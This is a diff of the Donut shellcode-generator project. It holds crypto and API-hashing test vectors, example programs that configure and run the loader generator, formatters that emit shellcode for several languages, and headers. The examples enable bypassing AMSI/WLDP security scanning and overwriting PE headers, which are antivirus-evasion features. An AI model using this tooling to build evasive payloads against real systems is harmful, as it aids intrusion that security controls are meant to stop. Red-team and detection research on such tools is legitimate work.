103148 { 0xd5, 0x60, 0x8d, 0x4d, 0xa2, 0xbf, 0x34, 0x7b,
104149 0xab, 0xf8, 0x77, 0x2f, 0xdf, 0xed, 0xde, 0x07 };
105150
151 // 128-bit counter
152 uint8_t ctr_tv[16] =
153 { 0xd0, 0x01, 0x36, 0x9b, 0xef, 0x6a, 0xa1, 0x05,
154 0x1d, 0x2d, 0x21, 0x98, 0x19, 0x8d, 0x88, 0x93 };
155
156 // 128-bit ciphertext for testing donut_encrypt
157 uint8_t donut_crypt_tv[16] =
158 { 0xd0, 0x01, 0x36, 0x9b, 0xef, 0x6a, 0xa1, 0x05,
159 0x1d, 0x2d, 0x21, 0x98, 0x19, 0x8d, 0x8b, 0x13 };
160
161 int crypto_test(void) {
162 uint8_t key[16], data[77], tmp[16];
163 int i, j;
164
165 memset(data, 0, sizeof(data));
166 memcpy(key, key_tv, 16);
167 memcpy(tmp, ctr_tv, 16);
168
169 for(i=0; i<128; i++) {
170 // encrypt data
171 donut_encrypt(key, tmp, data, sizeof(data));
172 // update key with first 16 bytes of ciphertext
173 for(j=0; j<16; j++) key[j] ^= data[j];
174 }
175 return (memcmp(tmp, donut_crypt_tv, 16) == 0);
176 }
177
106178 int main(void) {
107 uint8_t data[16];
179 uint8_t tmp1[16];
108180 int equ;
109181
110 memcpy(data, plain, 16);
111 chaskey(key, data);
112 equ = (memcmp(data, cipher, 16)==0);
182 // Chaskey test
183 memcpy(tmp1, plain_tv, 16);
184 chaskey(key_tv, tmp1);
185 equ = (memcmp(tmp1, cipher_tv, 16)==0);
113186 printf("Chaskey test : %s\n", equ ? "OK" : "FAILED");
187 printf("Donut Encrypt test : %s\n", crypto_test() ? "OK" : "FAILED");
114188 return 0;
115189 }
116190
+83
-0
examples/dynamic.c less more
0
1 // dynamic example (doesn't work with .NET DLL)
2 // odzhan
3
4 #include "donut.h"
5
6 int main(int argc, char *argv[]) {
7 DONUT_CONFIG c;
8 int err;
9
10 // function pointers
11 DonutCreate_t _DonutCreate;
12 DonutDelete_t _DonutDelete;
13 DonutError_t _DonutError;
14
15 // need at least a file
16 if(argc != 2) {
17 printf(" [ usage: donut_dynamic <file>\n");
18 return 0;
19 }
20
21 // try load donut.dll or donut.so
22 #if defined(WINDOWS)
23 HMODULE m = LoadLibrary("donut.dll");
24 if(m != NULL) {
25 _DonutCreate = (DonutCreate_t)GetProcAddress(m, "DonutCreate");
26 _DonutDelete = (DonutDelete_t)GetProcAddress(m, "DonutDelete");
27 _DonutError = (DonutError_t) GetProcAddress(m, "DonutError");
28
29 if(_DonutCreate == NULL || _DonutDelete == NULL || _DonutError == NULL) {
30 printf(" [ Unable to resolve Donut API.\n");
31 return 0;
32 }
33 } else {
34 printf(" [ Unable to load donut.dll.\n");
35 return 0;
36 }
37 #else
38 void *m = dlopen("donut.so", RTLD_LAZY);
39 if(m != NULL) {
40 _DonutCreate = (DonutCreate_t)dlsym(m, "DonutCreate");
41 _DonutDelete = (DonutDelete_t)dlsym(m, "DonutDelete");
42 _DonutError = (DonutError_t) dlsym(m, "DonutError");
43
44 if(_DonutCreate == NULL || _DonutDelete == NULL || _DonutError == NULL) {
45 printf(" [ Unable to resolve Donut API.\n");
46 return 0;
47 }
48 } else {
49 printf(" [ Unable to load donut.so.\n");
50 return 0;
51 }
52 #endif
53
54 memset(&c, 0, sizeof(c));
55
56 // copy input file
57 lstrcpyn(c.input, argv[1], DONUT_MAX_NAME-1);
58
59 // default settings
60 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
61 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
62 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
63 c.headers = DONUT_HEADERS_OVERWRITE;// overwrite PE headers
64 c.format = DONUT_FORMAT_BINARY; // default output format
65 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
66 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
67 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
68 c.thread = 1; // run entrypoint as a thread
69 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
70
71 // generate the shellcode
72 err = _DonutCreate(&c);
73 if(err != DONUT_ERROR_SUCCESS) {
74 printf(" [ Error : %s\n", _DonutError(err));
75 return 0;
76 }
77
78 printf(" [ loader saved to %s\n", c.output);
79
80 _DonutDelete(&c);
81 return 0;
82 }
+45
-0
examples/static.c less more
0
1 // static example (doesn't work with .NET DLL)
2 // odzhan
3
4 #include "donut.h"
5
6 int main(int argc, char *argv[]) {
7 DONUT_CONFIG c;
8 int err;
9
10 // need at least a file
11 if(argc != 2) {
12 printf(" [ usage: donut_static <file>\n");
13 return 0;
14 }
15
16 memset(&c, 0, sizeof(c));
17
18 // copy input file
19 lstrcpyn(c.input, argv[1], DONUT_MAX_NAME-1);
20
21 // default settings
22 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
23 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
24 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
25 c.headers = DONUT_HEADERS_OVERWRITE;// overwrite PE headers
26 c.format = DONUT_FORMAT_BINARY; // default output format
27 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
28 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
29 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
30 c.thread = 1; // run entrypoint as a thread
31 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
32
33 // generate the shellcode
34 err = DonutCreate(&c);
35 if(err != DONUT_ERROR_SUCCESS) {
36 printf(" [ Error : %s\n", DonutError(err));
37 return 0;
38 }
39
40 printf(" [ loader saved to %s\n", c.output);
41
42 DonutDelete(&c);
43 return 0;
44 }
+228
-0
format.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "format.h"
32
33 /**
34 Encoding: base64
35 Author : Odzhan
36
37 Encoding: c, python, ruby, c#, powershell and hex
38 Author : BITAM Salim https://github.com/soolidsnake
39 */
40
41 // calculate length of buffer required for base64 encoding
42 #define B64_LEN(N) (((4 * (N / 3)) + 4) & -4)
43
44 static const char b64_tbl[] =
45 "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
46
47 // Compact implementation of base64 encoding.
48 // The main encoding loop is inspired by Qkumba AKA Peter Ferrie.
49 // This uses a lookup table and accounts for unaligned input.
50 //
51 // odzhan
52 //
53 static int b64_encode(
54 const void *src, uint32_t inlen,
55 void *dst, uint32_t *outlen)
56 {
57 uint32_t i, len, x;
58 uint8_t *in = (uint8_t*)src, *out = (uint8_t*)dst;
59
60 // check arguments
61 if(outlen == NULL) return 0;
62
63 // calculate length of buffer required for encoded string
64 len = B64_LEN(inlen);
65
66 // return the length?
67 if(out == NULL) {
68 *outlen = len;
69 return 1;
70 }
71
72 // can buffer contain string?
73 if(len > *outlen) return 0;
74
75 // main encoding loop
76 while(inlen != 0) {
77 // load 3 bytes or whatever remains
78 for(x=i=0; i<3; i++) {
79 // add byte from input or zero
80 x |= ((i < inlen) ? *in++ : 0);
81 x <<= 8;
82 }
83 // increase by 1
84 inlen++;
85 // encode 3 bytes
86 for(i=4; inlen && i>0; i--) {
87 x = ROTL32(x, 6);
88 *out++ = b64_tbl[x % 64];
89 --inlen;
90 }
91 }
92 // if required, add padding
93 while(i!=0) { *out++ = '='; i--; }
94 // add null terminator
95 *out = 0;
96 // calculate output length by subtracting 2 pointers
97 *outlen = (uint32_t)(out - (uint8_t*)dst);
98 return 1;
99 }
100
101 int base64_template(void *pic, uint32_t pic_len, FILE *fd) {
102 uint32_t outlen;
103 void *base64;
104
105 DPRINT("Calculating length of base64 encoding");
106 if(b64_encode(NULL, pic_len, NULL, &outlen)) {
107 DPRINT("Required length is %"PRId32, outlen);
108 base64 = calloc(1, outlen + 1);
109 if(base64 == NULL) {
110 return DONUT_ERROR_NO_MEMORY;
111 }
112 DPRINT("Encoding shellcode");
113 if(b64_encode(pic, pic_len, base64, &outlen)) {
114 DPRINT("Writing %"PRId32 " bytes to file", outlen);
115 fwrite(base64, 1, outlen, fd);
116 }
117 }
118 // if on windows, copy base64 string to clipboard
119 #if defined(WINDOWS)
120 LPTSTR strCopy;
121 HGLOBAL hCopy;
122
123 DPRINT("Opening clipboard");
124 if(OpenClipboard(NULL)) {
125 DPRINT("Empying contents");
126 EmptyClipboard();
127
128 DPRINT("Allocating memory");
129 hCopy = GlobalAlloc(GMEM_MOVEABLE, outlen);
130 if(hCopy != NULL) {
131 strCopy = GlobalLock(hCopy);
132 // copy base64 string to memory
133 CopyMemory(strCopy, base64, outlen);
134 GlobalLock(hCopy);
135 DPRINT("Setting clipboard data");
136 // copy to clipboard
137 SetClipboardData(CF_TEXT, hCopy);
138 GlobalFree(hCopy);
139 }
140 CloseClipboard();
141 }
142 #endif
143 DPRINT("Freeing memory");
144 free(base64);
145 return DONUT_ERROR_OK;
146 }
147
148 int c_ruby_template(void * pic, uint32_t pic_len, FILE* fd){
149 uint32_t j;
150 uint8_t *p = (uint8_t*)pic;
151
152 fprintf(fd, "unsigned char buf[] = \n");
153
154 for(j=0; j < pic_len; j++) {
155 if(j % 16 == 0) fputc('\"', fd);
156
157 fprintf(fd, "\\x%02x", p[j]);
158
159 if(j % 16 == 15 && j+1 < pic_len){
160 fprintf(fd, "\"\n");
161 }
162 }
163 fprintf(fd, "\";\n");
164
165 return DONUT_ERROR_OK;
166 }
167
168 int py_template(void * pic, uint32_t pic_len, FILE* fd){
169 uint32_t j;
170 uint8_t *p = (uint8_t*)pic;
171
172 fprintf(fd, "buf = \"\"\n");
173
174 for(j=0; j < pic_len; j++){
175 if(j % 16 == 0) {
176 fprintf(fd, "buff += \"");
177 }
178 fprintf(fd, "\\x%02x", p[j]);
179
180 if(j % 16 == 15) {
181 fprintf(fd, "\"\n");
182 }
183 }
184 if(j % 16 != 0) {
185 fputc('\"', fd);
186 }
187 return DONUT_ERROR_OK;
188 }
189
190 int powershell_template(void * pic, uint32_t pic_len, FILE* fd){
191 uint32_t j;
192 uint8_t *p = (uint8_t*)pic;
193
194 fprintf(fd, "[Byte[]] $buf = ");
195
196 for(j=0; j < pic_len; j++){
197 fprintf(fd, "0x%02x", p[j]);
198 if(j < pic_len-1) fputc(',', fd);
199 }
200 return DONUT_ERROR_OK;
201 }
202
203 int csharp_template(void * pic, uint32_t pic_len, FILE* fd){
204 uint32_t j;
205 uint8_t *p = (uint8_t*)pic;
206
207 fprintf(fd, "byte[] my_buf = new byte[%" PRId32"] {\n", pic_len);
208
209 for(j=0; j < pic_len; j++){
210 fprintf(fd, "0x%02x", p[j]);
211 if(j < pic_len-1) fputc(',', fd);
212 }
213 fprintf(fd, "};");
214
215 return DONUT_ERROR_OK;
216 }
217
218 int hex_template(void * pic, uint32_t pic_len, FILE* fd){
219 uint32_t j;
220 uint8_t *p = (uint8_t*)pic;
221
222 for(j=0; j < pic_len; j++){
223 fprintf(fd, "\\x%02x", p[j]);
224 }
225 return DONUT_ERROR_OK;
226 }
227
+7
-0
generators/Readme.md less more
0 # Generators
1
2 This folder contains Donut generators written in other languages than C. They are all developed by third-parties and are maintained separately, but are linked here as submodules. To clone Donut along with the submodules, run:
3
4 ```
5 git clone https://github.com/TheWover/donut.git --recursive
6 ```
+230
-23
hash.c less more
5353 t = k[3];
5454 k[3] = (ROTR32(k[1], 8) + k[0]) ^ i;
5555 k[0] = ROTR32(k[0],29) ^ k[3];
56 k[1] = k[2]; k[2] = t;
56
57 k[1] = k[2];
58 k[2] = t;
5759 }
5860 // return 64-bit ciphertext
5961 return x.q;
107109
108110 #ifdef TEST
109111
112 #include <stdint.h>
110113 #include <stdio.h>
111114 #include <stdlib.h>
112115 #include <string.h>
116 #include <sys/stat.h>
117 #include <inttypes.h>
118 #include <fcntl.h>
119
120 #if defined(_WIN32) || defined(_WIN64)
121 #define WINDOWS
122 #include <windows.h>
123 #pragma comment(lib, "advapi32.lib")
124 #else
125 #include <unistd.h>
126 #endif
127
128 // ******************************
129 // test vectors for SPECK-64/128
130 //
131 // 128-bit key
132 uint8_t key64[16]=
133 { 0x00, 0x01, 0x02, 0x03,
134 0x08, 0x09, 0x0a, 0x0b,
135 0x10, 0x11, 0x12, 0x13,
136 0x18, 0x19, 0x1a, 0x1b };
137
138 // 64-bit plain text
139 uint8_t plain64[8]=
140 { 0x74, 0x65, 0x72, 0x3b,
141 0x2d, 0x43, 0x75, 0x74 };
142
143 // 64-bit cipher text
144 uint8_t cipher64[8]=
145 { 0x48, 0xa5, 0x6f, 0x8c,
146 0x8b, 0x02, 0x4e, 0x45 };
147
148 // 64-bit type
149 typedef union _w64_t {
150 uint8_t b[8];
151 uint32_t w[2];
152 uint64_t q;
153 } w64;
154
155 // ******************************
156 // test vectors for Maru hash
157 //
158 typedef struct _maru_tv_t {
159 const char *str;
160 uint64_t hash;
161 } maru_tv_t;
162
163 maru_tv_t maru_tv[MARU_MAX_STR] = {
164 {"", 0x8E63EC0D29F27D07},
165 {"C", 0x19C7DC40E602AC8E},
166 {"73", 0x5197B6ACC87EF423},
167 {"NY4", 0x3BC2F21615A953C5},
168 {"X9TM", 0xC9EC6B72BF5273D6},
169 {"H339P", 0x6B60077EF084C1E2},
170 {"TMCT3N", 0x33374AA7206F00FC},
171 {"RF4M66W", 0xF7B91D9C42A886C5},
172 {"XTCX43NN", 0x615D4FB7A2246376},
173 {"C6XCYXF9F", 0x80D4B6324A24CEB6},
174 {"RR3TN69H9M", 0xE6369CFF4F98B4F8},
175 {"F9C9YNTMYYR", 0xF173A1158A4D80A9},
176 {"FPW779364RYH", 0x517A4E86DF00BB97},
177 {"WHN4N9CT7YF7C", 0xFCBA9541CD7765A5},
178 {"633H6CTRC64FWR", 0x79EEC9CC663EDDC1},
179 {"WPNX66993HPWNYX", 0x139CFA0D49AF17DC},
180 {"H66C3Y9F677WP96N", 0xEFF27A644D53171A},
181 {"TY3YX7N3FPN7YNWT4", 0x5361C6DBF89D0B47},
182 {"YF496N7XH4HYHRN6WM", 0x71451CE666D8E9A4},
183 {"TWP4M739RYTCTFMMCC7", 0xC17E5C46E2BEAD},
184 {"4FHNWP4MR9TT9Y6HYWCX", 0x1E40C5A64B8ECE85},
185 {"TCMHT3TF7T4TRCWCF6RPF", 0xD02290F438AA84A9},
186 {"4WW63CTHPR36MN7P3WXTHT", 0x79FBDCFC2ECE09FF},
187 {"NFFMNM3CF3NXY6P9MCC7YPX", 0x10B7C56D102D623B},
188 {"R74YN9MX7PMP364HYNYCR9FY", 0x86EC8AA614611458},
189 {"94X3NFT7W4FPTX3MCTY99HMPR", 0x7929169892B04FC1},
190 {"66R379FR67W7T7H79WTCF37H6Y", 0xBEA85FD3754045D8},
191 {"4F6HFPT3NRN7WPP766RFCXR43RX", 0x76E410266A6830A},
192 {"HP374TWWPMYRTTWC6Y6T4C4T4HP4", 0x6A7509443FF48F74},
193 {"TTX3966P63XPYMPM6XM994TX9X9X3", 0xA8AFC37C137AE14},
194 {"34TX7XRX4WH7T6PW439TNRY77FHPT4", 0xE64667746B53394},
195 {"P3WRCCT4PXN3H6PMNR3YXY6X379MTXH", 0xCE981B296791D5C7},
196 {"73YF99H9XXTYC6XF6CXTPCM4YXYN33R4", 0xE39B1FC51BED4BA9},
197 {"T7R3PR43C93MH4TRT6M644T7RCXMX4WM6", 0xE25C6B39CB28FDB5},
198 {"44M69YYFX3C9H9M6P46933PW34RRCM9NXX", 0x84DBD675600E871E},
199 {"7TW7P76CXMFC3HFTFHMWXWW33TWTPT6PYP3", 0xE00F660E699F9231},
200 {"6CH6W7WYHH7HXT7RTMW4FRCN39HR997F6FWN", 0x32AEC917C63A878E},
201 {"WF3HNPT37XPPXYFXR447F7RWF3C69H74CT6R6", 0x4B4FCD2604496365},
202 {"WR9CCHH9NNNXCXYMXMFFW6YYC7449M4HYXM4MC", 0x330DA5A18A58C952},
203 {"C9993Y93PTWYRNP46PYN763RNFYP4PN4WWHR9CM", 0x5249D03CD52C71DB},
204 {"XNPXCY47FWWMTFF6R7RWNX79MC4YN43M9RYCC4RX", 0xF11E92E74F70C4F4},
205 {"3RPX6MFNCWPMPT3M467HWCYCHH9PM7R6MFWXYXNTN", 0x86C8BD9789AA71BE},
206 {"633MWRYMCYF3TTCRP6HXTR9TTX43T3MYXPPWMWFMF6", 0xA5F12FC7418615CC},
207 {"RW7NN6Y4779639NNTHN6TR939F3799FNWTH4FP46RNY", 0x37EADA4549B0B96F},
208 {"MCTRH9PTXRXFPMYRP9Y4TC4PCRX4W9YFCW649R3YN33W", 0x8E5BADDF84BB9779},
209 {"F7RT3H36PNH6CF9TWCRNYMFWX9M9MTTNY6C7X43HC4PN9", 0x8040D317E8DCD294},
210 {"7HTCNCTNHRFY6HCRTYPTHYP3H9T4PR96RWRY7NRPTMH936", 0x151FB43ECC51AFA1},
211 {"NYRMPMYCWXTPRCYM9TX6Y4XTMY9RT3PHH49PP36H7XR7WPN", 0x650A8724A052DFC5},
212 {"6PX3XWM3X973693M4F373R3N9FNC4CCTXN3CTTYMP3NW4C49", 0x9E48D8154522BFDD},
213 {"74RNX9MTPW7FNY9WMTXNPPRMR97PRPPRCN3CMHPNWFFW44R3C", 0xDC1ABDA05084DCBA},
214 {"47NC63XRTXXPWHN76H9XF9R7TTHWR6T7XMF9TMCHP4FX4WCYTT", 0x5DC075A21ECF2DD8},
215 {"TYMXHXC4N6XXTR4T7X37PHWTYXFF9M7MXP6477RW4FM7P9PFXFR", 0x2CD151D5D71FA785},
216 {"MRPW7NCXPT4N7YN3WN7P9WYNY3PPR464WR7P7PP37MXFF9FC7WTH", 0x7B88469D5AFE14D9},
217 {"9XW6RYX6NTYC4NCRR7YRTWM7HWNFXRT4P396CYMFPRNTRW3X69R39", 0x81E069528C3C9BEE},
218 {"9NMRWF4W34MHWTPP74RY34YWMT94H76HTRX34MR7C9MF696M3TXMN3", 0x4D19A0CB3BC48BFF},
219 {"HF6FM9RMT3NPMR37TX3FPTFYRFNXTMHWTF7WN94YNP4TMP3FNHM3N9F", 0x30CEBE63BE4E30F1},
220 {"NW7CCWFTTNFPMTY3H6X96HX6MXY67W3RPTRCCWHWPYPC7PPRF74PH7RC", 0x64F3DF1E551B22BE},
221 {"HFH43PM9TNCCW79XCMW79HYCN4HY6MT9MFFRYRXYX4H3P9T9FHF6NWC3C", 0xEF36678895FBB3A8},
222 {"N7WH9WYMNHYY3C3RRFTW3RNYH3C646C97FTPT3MH7TMW6MTC4PT44NWCWH", 0x1B75D90E82D98E1D},
223 {"663F4T7PMWN996R9FYWRY3Y33HCNFH6PRWF9TPHN363YFFF6C9CHTP3XNXP", 0x25767AD747B833D6},
224 {"3P7934TX6CFHPM6TWY6H4CXT47P4XRMFTPNMCFP9H9F4MPFWWF9XRMPHFCYX", 0x1F3E15CB56A60E93},
225 {"WW6YN7NXTH9TRT4PYW9W3WTNP9XMHP6Y3NPX7R93Y763M9HRHWTN93W3M9WX3", 0x744735578C4F6EF2},
226 {"HT6R4P6P7T4YFYYX3H3F49XYMPCPMWNT6R3PHTM47PTHTRCN9XMFHHYTH7TMPY", 0x559EA0D5309795E6},
227 {"NHP9Y96YYF44H7NN33WYYC364CY3W4FNF6F7WTHN6WFF6RXXRWNRFF4T9XF934N", 0xBE7F06CC36982F52},
228 };
229
230 void bin2hex(const char *str, void *bin, int len) {
231 int i;
232 uint8_t *p = (uint8_t*)bin;
233
234 printf("%s[%i] = { ", str, len);
235
236 for(i=0;i<len;i++) {
237 printf("0x%02x", p[i]);
238 if((i+1) != len) putchar(',');
239 }
240 printf(" };\n");
241 }
242
243 // returns 1 on success else <=0
244 static int CreateRandom(void *buf, uint64_t len) {
245
246 #if defined(WINDOWS)
247 HCRYPTPROV prov;
248 int ok;
249
250 // 1. acquire crypto context
251 if(!CryptAcquireContext(
252 &prov, NULL, NULL,
253 PROV_RSA_AES,
254 CRYPT_VERIFYCONTEXT | CRYPT_SILENT)) return 0;
255
256 ok = (int)CryptGenRandom(prov, (DWORD)len, buf);
257 CryptReleaseContext(prov, 0);
258
259 return ok;
260 #else
261 int fd;
262 uint64_t r=0;
263 uint8_t *p=(uint8_t*)buf;
264
265 fd = open("/dev/urandom", O_RDONLY);
266
267 if(fd > 0) {
268 for(r=0; r<len; r++, p++) {
269 if(read(fd, p, 1) != 1) break;
270 }
271 close(fd);
272 }
273 return r == len;
274 #endif
275 }
276
277 // Generate a random string, not exceeding MARU_MAX_STR bytes
278 // tbl is from https://stackoverflow.com/a/27459196
279 static int GenRandomString(void *output, uint64_t len) {
280 uint8_t rnd[MARU_MAX_STR];
281 int i;
282 char tbl[]="HMN34P67R9TWCXYF";
283 char *str = (char*)output;
284
285 if(len > (MARU_MAX_STR - 1)) return 0;
286
287 // generate MARU_MAX_STR random bytes
288 if(!CreateRandom(rnd, MARU_MAX_STR)) return 0;
289
290 // generate a string using unambiguous characters
291 for(i=0; i<len; i++) {
292 str[i] = tbl[rnd[i] % (sizeof(tbl) - 1)];
293 }
294 str[i] = 0;
295 return 1;
296 }
297
298 void gen_maru_tv(void) {
299 char str[MARU_MAX_STR+1];
300 w64 h, iv;
301 int i;
302
303 // copy 64-bit IV (just using the speck ciphertext)
304 memcpy(iv.b, cipher64, 8);
305
306 // create vectors
307 for(i=0; i<MARU_MAX_STR; i++) {
308 // generate a random string
309 memset(str, 0, sizeof(str));
310 GenRandomString(str, i);
311
312 // derive a hash for string
313 h.q = maru(str, iv.q);
314
315 printf("{\"%s\", 0x%llX},\n", str, h.q);
316 }
317 }
113318
114319 int main(int argc, char *argv[]) {
115
116 uint64_t ulDllHash, ulApiHash, iv;
117 char *api, *dll;
118
119 if(argc != 4) {
120 printf("\nusage: maru <iv> <dll> <api>\n");
121 return 0;
122 }
123
124 // convert hexadecimal IV to binary
125 iv = strtoull(argv[1], NULL, 16);
126 dll = argv[2];
127 api = argv[3];
128
129 printf("\nIV : %p\n", (void*)iv);
130
131 ulDllHash = maru(dll, iv);
132 printf("DLL : %p\n", (void*)ulDllHash);
133
134 ulApiHash = maru(api, iv) + ulDllHash;
135 printf("API : %p\n", (void*)ulApiHash);
136
320 int i, equ;
321 w64 p, c, h, iv;
322
323 // copy 64-bit plaintext
324 memcpy(p.b, plain64, 8);
325
326 // encrypt in-place with 128-bit key
327 c.q = speck(key64, p.q);
328 equ = (memcmp(c.b, cipher64, 8)==0);
329 printf("SPECK-64/128 Test : %s\n\n", equ ? "OK" : "FAILED");
330
331 // set iv
332 memcpy(iv.b, cipher64, 8);
333
334 // compare test vectors
335 for(i=0; i<MARU_MAX_STR; i++) {
336 h.q = maru(maru_tv[i].str, iv.q);
337
338 if(maru_tv[i].hash != h.q) {
339 printf("Maru test # %i failed.\n", i);
340 break;
341 }
342 }
343 if(i == MARU_MAX_STR) printf("Maru tests OK\n");
137344 return 0;
138345 }
139346 #endif
img/ST_generate_and_copy.PNG less more
Binary diff not shown
img/ST_generate_and_copy_86.PNG less more
Binary diff not shown
img/ST_inject.PNG less more
Binary diff not shown
img/ST_success.PNG less more
Binary diff not shown
img/detected.png less more
Binary diff not shown
img/donut.PNG less more
Binary diff not shown
img/donut_logo.png less more
Binary diff not shown
img/donut_logo_black.jpg less more
Binary diff not shown
img/donut_logo_white.jpg less more
Binary diff not shown
img/generate_and_copy.PNG less more
Binary diff not shown
img/iexplore.png less more
Binary diff not shown
+65
-0
include/aplib.h less more
0 /*
1 * aPLib compression library - the smaller the better :)
2 *
3 * ELF 64-bit format header file
4 *
5 * Copyright (c) 1998-2014 Joergen Ibsen
6 * All Rights Reserved
7 *
8 * http://www.ibsensoftware.com/
9 */
10
11 #ifndef APLIB_H_INCLUDED
12 #define APLIB_H_INCLUDED
13
14 #ifdef __cplusplus
15 extern "C" {
16 #endif
17
18 #ifndef APLIB_ERROR
19 # define APLIB_ERROR ((unsigned int) (-1))
20 #endif
21
22 unsigned int aP_pack(const void *source,
23 void *destination,
24 unsigned int length,
25 void *workmem,
26 int (*callback)(unsigned int, unsigned int, unsigned int, void *),
27 void *cbparam);
28
29 unsigned int aP_workmem_size(unsigned int inputsize);
30
31 unsigned int aP_max_packed_size(unsigned int inputsize);
32
33 unsigned int aP_depack_asm(const void *source, void *destination);
34
35 unsigned int aP_depack_asm_fast(const void *source, void *destination);
36
37 unsigned int aP_depack_asm_safe(const void *source,
38 unsigned int srclen,
39 void *destination,
40 unsigned int dstlen);
41
42 unsigned int aP_crc32(const void *source, unsigned int length);
43
44 unsigned int aPsafe_pack(const void *source,
45 void *destination,
46 unsigned int length,
47 void *workmem,
48 int (*callback)(unsigned int, unsigned int, unsigned int, void *),
49 void *cbparam);
50
51 unsigned int aPsafe_check(const void *source);
52
53 unsigned int aPsafe_get_orig_size(const void *source);
54
55 unsigned int aPsafe_depack(const void *source,
56 unsigned int srclen,
57 void *destination,
58 unsigned int dstlen);
59
60 #ifdef __cplusplus
61 } /* extern "C" */
62 #endif
63
64 #endif /* APLIB_H_INCLUDED */
+30
-0
include/depack.h less more
0 /*
1 * aPLib compression library - the smaller the better :)
2 *
3 * C depacker, header file
4 *
5 * Copyright (c) 1998-2014 Joergen Ibsen
6 * All Rights Reserved
7 *
8 * http://www.ibsensoftware.com/
9 */
10
11 #ifndef DEPACK_H_INCLUDED
12 #define DEPACK_H_INCLUDED
13
14 #ifdef __cplusplus
15 extern "C" {
16 #endif
17
18 #ifndef APLIB_ERROR
19 # define APLIB_ERROR ((unsigned int) (-1))
20 #endif
21
22 /* function prototype */
23 unsigned int aP_depack(const void *source, void *destination);
24
25 #ifdef __cplusplus
26 } /* extern "C" */
27 #endif
28
29 #endif /* DEPACK_H_INCLUDED */
+292
-173
include/donut.h less more
3131 #ifndef DONUT_H
3232 #define DONUT_H
3333
34 #ifdef _MSC_VER
35 #define _CRT_SECURE_NO_WARNINGS
36 #define _CRT_NONSTDC_NO_DEPRECATE
37 #endif
38
3439 #include <stdint.h>
3540 #include <stdio.h>
3641 #include <stdlib.h>
3742 #include <string.h>
43 #include <ctype.h>
3844 #include <sys/stat.h>
3945 #include <inttypes.h>
4046 #include <fcntl.h>
47 #include <limits.h>
48 #include <wchar.h>
4149
4250 #if defined(_WIN32) || defined(_WIN64)
4351 #define WINDOWS
4452 #include <windows.h>
45 #ifndef PAYLOAD_H
53 #ifndef LOADER_H
4654 #include "mmap.h"
4755 #endif
4856 #if defined(_MSC_VER)
4957 #pragma comment(lib, "advapi32.lib")
58 #pragma comment(lib, "user32.lib")
59 #define strcasecmp stricmp
5060 #endif
5161 #else
5262 #define LINUX
5666 #include "pe.h"
5767 #endif
5868
59 #ifndef PAYLOAD_H
69 #ifndef LOADER_H
6070
6171 #if defined(DEBUG)
6272 #define DPRINT(...) { \
7080
7181 #endif
7282
73 #if !defined(NOCRYPTO)
7483 #include "hash.h" // api hashing
7584 #include "encrypt.h" // symmetric encryption of instance+module
85 #include "format.h" // output format for loader
86 #include "aplib.h" // aPLib compression for both windows + linux
87
88 #ifndef MAX_PATH
89 #define MAX_PATH 260
7690 #endif
7791
7892 #if !defined(WINDOWS)
93107 } GUID;
94108 #endif
95109
96 #define DONUT_KEY_LEN CIPHER_KEY_LEN
97 #define DONUT_BLK_LEN CIPHER_BLK_LEN
98
99 #define DONUT_ERROR_SUCCESS 0
100 #define DONUT_ERROR_FILE_NOT_FOUND 1
101 #define DONUT_ERROR_FILE_EMPTY 2
102 #define DONUT_ERROR_FILE_ACCESS 3
103 #define DONUT_ERROR_FILE_INVALID 4
104 #define DONUT_ERROR_NET_PARAMS 5
105 #define DONUT_ERROR_NO_MEMORY 6
106 #define DONUT_ERROR_INVALID_ARCH 7
107 #define DONUT_ERROR_INVALID_URL 8
108 #define DONUT_ERROR_URL_LENGTH 9
109 #define DONUT_ERROR_INVALID_PARAMETER 10
110 #define DONUT_ERROR_RANDOM 11
111 #define DONUT_ERROR_DLL_FUNCTION 12
112 #define DONUT_ERROR_ARCH_MISMATCH 13
